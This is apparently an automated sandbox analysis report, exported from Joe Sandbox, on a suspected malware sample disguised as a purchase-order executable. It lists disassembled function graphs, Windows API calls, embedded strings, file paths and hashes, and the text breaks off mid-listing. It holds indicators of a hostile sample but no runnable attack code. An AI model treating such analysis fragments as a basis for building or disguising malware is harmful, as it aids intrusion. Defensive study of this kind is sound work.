                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$POB$\*.*
                                                        • API String ID: 2035342205-3638519621
                                                        • Opcode ID: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
                                                        • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                        • Opcode Fuzzy Hash: 5bbbe9736573e0873f2e1386b99e889a7b8e3f986854e9af084b80f90e64b115
                                                        • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 681 406da0-406da5 682 406e16-406e34 681->682 683 406da7-406dd6 681->683 684 40740c-407421 682->684 685 406dd8-406ddb 683->685 686 406ddd-406de1 683->686 690 407423-407439 684->690 691 40743b-407451 684->691 687 406ded-406df0 685->687 688 406de3-406de7 686->688 689 406de9 686->689 693 406df2-406dfb 687->693 694 406e0e-406e11 687->694 688->687 689->687 692 407454-40745b 690->692 691->692 697 407482-40748e 692->697 698 40745d-407461 692->698 695 406e00-406e0c 693->695 696 406dfd 693->696 699 406fe3-407001 694->699 703 406e76-406ea4 695->703 696->695 706 406c24-406c2d 697->706 704 407610-40761a 698->704 705 407467-40747f 698->705 701 407003-407017 699->701 702 407019-40702b 699->702 710 40702e-407038 701->710 702->710 708 406ec0-406eda 703->708 709 406ea6-406ebe 703->709 707 407626-407639 704->707 705->697 714 406c33 706->714 715 40763b 706->715 716 40763e-407642 707->716 711 406edd-406ee7 708->711 709->711 712 40703a 710->712 713 406fdb-406fe1 710->713 718 406eed 711->718 719 406e5e-406e64 711->719 720 406fb6-406fba 712->720 721 40714b-407158 712->721 713->699 717 406f7f-406f89 713->717 722 406c3a-406c3e 714->722 723 406d7a-406d9b 714->723 724 406cdf-406ce3 714->724 725 406d4f-406d53 714->725 715->716 728 4075ce-4075d8 717->728 729 406f8f-406fb1 717->729 739 406e43-406e5b 718->739 740 4075aa-4075b4 718->740 730 406f17-406f1d 719->730 731 406e6a-406e70 719->731 732 406fc0-406fd8 720->732 733 4075c2-4075cc 720->733 721->706 737 4071a7-4071b6 721->737 722->707 738 406c44-406c51 722->738 723->684 735 406ce9-406d02 724->735 736 40758f-407599 724->736 726 406d59-406d6d 725->726 727 40759e-4075a8 725->727 741 406d70-406d78 726->741 727->707 728->707 729->721 742 406f7b 730->742 743 406f1f-406f3d 730->743 731->703 731->742 732->713 733->707 745 406d05-406d09 735->745 736->707 737->684 738->715 744 406c57-406c9d 738->744 739->719 740->707 741->723 741->725 742->717 749 406f55-406f67 743->749 750 406f3f-406f53 743->750 746 406cc5-406cc7 744->746 747 406c9f-406ca3 744->747 745->724 748 406d0b-406d11 745->748 754 406cd5-406cdd 746->754 755 406cc9-406cd3 746->755 752 406ca5-406ca8 GlobalFree 747->752 753 406cae-406cbc GlobalAlloc 747->753 756 406d13-406d1a 748->756 757 406d3b-406d4d 748->757 751 406f6a-406f74 749->751 750->751 751->730 758 406f76 751->758 752->753 753->715 759 406cc2 753->759 754->745 755->754 755->755 760 406d25-406d35 GlobalAlloc 756->760 761 406d1c-406d1f GlobalFree 756->761 757->741 763 4075b6-4075c0 758->763 764 406efc-406f14 758->764 759->746 760->715 760->757 761->760 763->707 764->730
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                        • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                        • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                        • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(74DF3420,00425F98,00425750,004060A2,00425750,00425750,00000000,00425750,00425750,74DF3420,?,74DF2EE0,00405DAE,?,74DF3420,74DF2EE0), ref: 004069EA
                                                        • FindClose.KERNEL32(00000000), ref: 004069F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                        • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                        • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                        • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 202 404102-404114 203 40411a-404120 202->203 204 40427b-40428a 202->204 203->204 205 404126-40412f 203->205 206 4042d9-4042ee 204->206 207 40428c-4042d4 GetDlgItem * 2 call 404601 SetClassLongW call 40140b 204->207 210 404131-40413e SetWindowPos 205->210 211 404144-40414b 205->211 208 4042f0-4042f3 206->208 209 40432e-404333 call 40464d 206->209 207->206 213 4042f5-404300 call 401389 208->213 214 404326-404328 208->214 221 404338-404353 209->221 210->211 216 40414d-404167 ShowWindow 211->216 217 40418f-404195 211->217 213->214 238 404302-404321 SendMessageW 213->238 214->209 220 4045ce 214->220 222 404268-404276 call 404668 216->222 223 40416d-404180 GetWindowLongW 216->223 224 404197-4041a9 DestroyWindow 217->224 225 4041ae-4041b1 217->225 227 4045d0-4045d7 220->227 234 404355-404357 call 40140b 221->234 235 40435c-404362 221->235 222->227 223->222 236 404186-404189 ShowWindow 223->236 228 4045ab-4045b1 224->228 230 4041b3-4041bf SetWindowLongW 225->230 231 4041c4-4041ca 225->231 228->220 241 4045b3-4045b9 228->241 230->227 231->222 237 4041d0-4041df GetDlgItem 231->237 234->235 242 404368-404373 235->242 243 40458c-4045a5 DestroyWindow EndDialog 235->243 236->217 244 4041e1-4041f8 SendMessageW IsWindowEnabled 237->244 245 4041fe-404201 237->245 238->227 241->220 246 4045bb-4045c4 ShowWindow 241->246 242->243 247 404379-4043c6 call 4066bf call 404601 * 3 GetDlgItem 242->247 243->228 244->220 244->245 249 404203-404204 245->249 250 404206-404209 245->250 246->220 274 4043d0-40440c ShowWindow KiUserCallbackDispatcher call 404623 EnableWindow 247->274 275 4043c8-4043cd 247->275 252 404234-404239 call 4045da 249->252 253 404217-40421c 250->253 254 40420b-404211 250->254 252->222 257 404252-404262 SendMessageW 253->257 259 40421e-404224 253->259 254->257 258 404213-404215 254->258 257->222 258->252 262 404226-40422c call 40140b 259->262 263 40423b-404244 call 40140b 259->263 272 404232 262->272 263->222 271 404246-404250 263->271 271->272 272->252 278 404411 274->278 279 40440e-40440f 274->279 275->274 280 404413-404441 GetSystemMenu EnableMenuItem SendMessageW 278->280 279->280 281 404443-404454 SendMessageW 280->281 282 404456 280->282 283 40445c-40449b call 404636 call 4040e3 call 406682 lstrlenW call 4066bf SetWindowTextW call 401389 281->283 282->283 283->221 294 4044a1-4044a3 283->294 294->221 295 4044a9-4044ad 294->295 296 4044cc-4044e0 DestroyWindow 295->296 297 4044af-4044b5 295->297 296->228 298 4044e6-404513 CreateDialogParamW 296->298 297->220 299 4044bb-4044c1 297->299 298->228 301 404519-404570 call 404601 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->301 299->221 300 4044c7 299->300 300->220 301->220 306 404572-404585 ShowWindow call 40464d 301->306 308 40458a 306->308 308->228
                                                        APIs
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040413E
                                                        • ShowWindow.USER32(?), ref: 0040415E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404170
                                                        • ShowWindow.USER32(?,00000004), ref: 00404189
                                                        • DestroyWindow.USER32 ref: 0040419D
                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041B6
                                                        • GetDlgItem.USER32(?,?), ref: 004041D5
                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041E9
                                                        • IsWindowEnabled.USER32(00000000), ref: 004041F0
                                                        • GetDlgItem.USER32(?,00000001), ref: 0040429B
                                                        • GetDlgItem.USER32(?,00000002), ref: 004042A5
                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 004042BF
                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404310
                                                        • GetDlgItem.USER32(?,00000003), ref: 004043B6
                                                        • ShowWindow.USER32(00000000,?), ref: 004043D7
                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004043E9
                                                        • EnableWindow.USER32(?,?), ref: 00404404
                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040441A
                                                        • EnableMenuItem.USER32(00000000), ref: 00404421
                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404439
                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040444C
                                                        • lstrlenW.KERNEL32(00422F48,?,00422F48,00000000), ref: 00404476
                                                        • SetWindowTextW.USER32(?,00422F48), ref: 0040448A
                                                        • ShowWindow.USER32(?,0000000A), ref: 004045BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                        • String ID: H/B
                                                        • API String ID: 121052019-184950203
                                                        • Opcode ID: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                        • Instruction ID: f8b0abefa6079376cca3afd4ac47b8e6787ccd0873a3a79b8952b84eeba681b3
                                                        • Opcode Fuzzy Hash: 6713c34f0db6ca24ad0fd02f4a6c26255f157c0ea2add66a7142b4456e47287b
                                                        • Instruction Fuzzy Hash: 91C1CFB1600204BBDB316F61EE85A2B7AB8EB85345F41053EF741B25F0CB795842DB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 309 403d54-403d6c call 406a76 312 403d80-403db7 call 406550 309->312 313 403d6e-403d7e call 4065c9 309->313 318 403db9-403dca call 406550 312->318 319 403dcf-403dd5 lstrcatW 312->319 322 403dda-403e03 call 40402a call 406059 313->322 318->319 319->322 327 403e95-403e9d call 406059 322->327 328 403e09-403e0e 322->328 334 403eab-403ed0 LoadImageW 327->334 335 403e9f-403ea6 call 4066bf 327->335 328->327 329 403e14-403e3c call 406550 328->329 329->327 336 403e3e-403e42 329->336 338 403f51-403f59 call 40140b 334->338 339 403ed2-403f02 RegisterClassW 334->339 335->334 340 403e54-403e60 lstrlenW 336->340 341 403e44-403e51 call 405f7e 336->341 350 403f63-403f6e call 40402a 338->350 351 403f5b-403f5e 338->351 342 404020 339->342 343 403f08-403f4c SystemParametersInfoW CreateWindowExW 339->343 347 403e62-403e70 lstrcmpiW 340->347 348 403e88-403e90 call 405f51 call 406682 340->348 341->340 346 404022-404029 342->346 343->338 347->348 354 403e72-403e7c GetFileAttributesW 347->354 348->327 362 403f74-403f8e ShowWindow call 406a06 350->362 363 403ff7-403ff8 call 4057da 350->363 351->346 357 403e82-403e83 call 405f9d 354->357 358 403e7e-403e80 354->358 357->348 358->348 358->357 370 403f90-403f95 call 406a06 362->370 371 403f9a-403fac GetClassInfoW 362->371 366 403ffd-403fff 363->366 368 404001-404007 366->368 369 404019-40401b call 40140b 366->369 368->351 372 40400d-404014 call 40140b 368->372 369->342 370->371 375 403fc4-403fe7 DialogBoxParamW call 40140b 371->375 376 403fae-403fbe GetClassInfoW RegisterClassW 371->376 372->351 380 403fec-403ff5 call 403ca4 375->380 376->375 380->346
                                                        APIs
                                                          • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                          • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                        • lstrcatW.KERNEL32(1033,00422F48), ref: 00403DD5
                                                        • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,74DF3420), ref: 00403E55
                                                        • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                        • GetFileAttributesW.KERNEL32(: Completed), ref: 00403E73
                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238), ref: 00403EBC
                                                          • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                        • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                        • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                        • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                        • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                        • API String ID: 1975747703-2229881518
                                                        • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                        • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                        • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                        • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 383 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 386 403125-40312a 383->386 387 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 383->387 388 40336f-403373 386->388 395 403163 387->395 396 403248-403256 call 403033 387->396 398 403168-40317f 395->398 402 403327-40332c 396->402 403 40325c-40325f 396->403 400 403181 398->400 401 403183-40318c call 4035e7 398->401 400->401 410 403192-403199 401->410 411 4032e3-4032eb call 403033 401->411 402->388 405 403261-403279 call 4035fd call 4035e7 403->405 406 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 403->406 405->402 435 40327f-403285 405->435 432 4032d9-4032de 406->432 433 4032ed-40331d call 4035fd call 403376 406->433 412 403215-403219 410->412 413 40319b-4031af call 40612d 410->413 411->402 420 403223-403229 412->420 421 40321b-403222 call 403033 412->421 413->420 430 4031b1-4031b8 413->430 423 403238-403240 420->423 424 40322b-403235 call 406b63 420->424 421->420 423->398 431 403246 423->431 424->423 430->420 437 4031ba-4031c1 430->437 431->396 432->388 444 403322-403325 433->444 435->402 435->406 437->420 439 4031c3-4031ca 437->439 439->420 441 4031cc-4031d3 439->441 441->420 443 4031d5-4031f5 441->443 443->402 445 4031fb-4031ff 443->445 444->402 446 40332e-40333f 444->446 449 403201-403205 445->449 450 403207-40320f 445->450 447 403341 446->447 448 403347-40334c 446->448 447->448 451 40334d-403353 448->451 449->431 449->450 450->420 452 403211-403213 450->452 451->451 453 403355-40336d call 40612d 451->453 452->420 453->388
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004030E9
                                                        • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00403105
                                                          • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                          • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                        • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 0040314E
                                                        • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                        Strings
                                                        • Null, xrefs: 004031CC
                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
                                                        • "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", xrefs: 004030DE
                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
                                                        • Inst, xrefs: 004031BA
                                                        • C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
                                                        • Error launching installer, xrefs: 00403125
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
                                                        • soft, xrefs: 004031C3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 2803837635-2451176394
                                                        • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                        • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                        • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                        • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 456 4066bf-4066c8 457 4066ca-4066d9 456->457 458 4066db-4066f5 456->458 457->458 459 406905-40690b 458->459 460 4066fb-406707 458->460 461 406911-40691e 459->461 462 406719-406726 459->462 460->459 463 40670d-406714 460->463 465 406920-406925 call 406682 461->465 466 40692a-40692d 461->466 462->461 464 40672c-406735 462->464 463->459 467 4068f2 464->467 468 40673b-40677e 464->468 465->466 470 406900-406903 467->470 471 4068f4-4068fe 467->471 472 406784-406790 468->472 473 406896-40689a 468->473 470->459 471->459 474 406792 472->474 475 40679a-40679c 472->475 476 40689c-4068a3 473->476 477 4068ce-4068d2 473->477 474->475 480 4067d6-4067d9 475->480 481 40679e-4067c4 call 406550 475->481 478 4068b3-4068bf call 406682 476->478 479 4068a5-4068b1 call 4065c9 476->479 482 4068e2-4068f0 lstrlenW 477->482 483 4068d4-4068dd call 4066bf 477->483 492 4068c4-4068ca 478->492 479->492 487 4067db-4067e7 GetSystemDirectoryW 480->487 488 4067ec-4067ef 480->488 497 4067ca-4067d1 call 4066bf 481->497 498 40687e-406881 481->498 482->459 483->482 493 406879-40687c 487->493 494 406801-406805 488->494 495 4067f1-4067fd GetWindowsDirectoryW 488->495 492->482 499 4068cc 492->499 493->498 500 40688e-406894 call 406930 493->500 494->493 496 406807-406825 494->496 495->494 502 406827-40682d 496->502 503 406839-406845 call 406a76 496->503 497->493 498->500 505 406883-406889 lstrcatW 498->505 499->500 500->482 509 406835-406837 502->509 512 40684d-406851 503->512 505->500 509->503 511 406873-406877 509->511 511->493 513 406853-406866 SHGetPathFromIDListW CoTaskMemFree 512->513 514 406868-406871 512->514 513->511 513->514 514->496 514->511
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 004067E1
                                                        • GetWindowsDirectoryW.KERNEL32(: Completed,00000400,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                        • SHGetPathFromIDListW.SHELL32(00000000,: Completed), ref: 00406855
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                        • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406889
                                                        • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
